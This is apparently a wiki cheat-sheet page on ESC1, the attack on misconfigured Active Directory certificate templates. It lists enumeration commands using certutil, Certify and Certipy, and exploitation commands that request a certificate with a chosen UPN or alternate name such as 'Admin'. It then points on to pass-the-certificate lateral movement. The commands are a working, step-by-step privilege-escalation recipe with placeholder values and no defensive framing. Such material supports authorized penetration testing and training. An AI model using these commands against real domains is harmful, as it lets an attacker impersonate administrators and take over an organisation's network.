search
githubEdit

ESC1 - Misconfigured Certificate Templates

hashtag
Enumeration

  • certutil -v -dsTemplate

  • certify.exe find [/vulnerable]

  • certipy find -u USER@DOMAIN -p PASSWORD -dc-ip DOMAIN_CONTROLLER

hashtag
Exploitation

  • certipy req -u USER@DOMAIN -p PASSWORD -target CA_SERVER -template 'VULNERABLE_TEMPLATE_NAME' -ca CA_NAME -upn TARGET_USER@DOMAIN (Linux)

  • certify.exe request /ca:SERVER\CA_NAME /template:"VULNERABLE_TEMPLATE_NAME" [/altname:"Admin"] (Windows)

hashtag
With this attack, we now perform Pass the Certificate Lateral Movement

PreviousESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2NextESC2/ESC3 - Misconfigured Enrollment Agent Templates (Use an enrollment agent to request a certifica

Last updated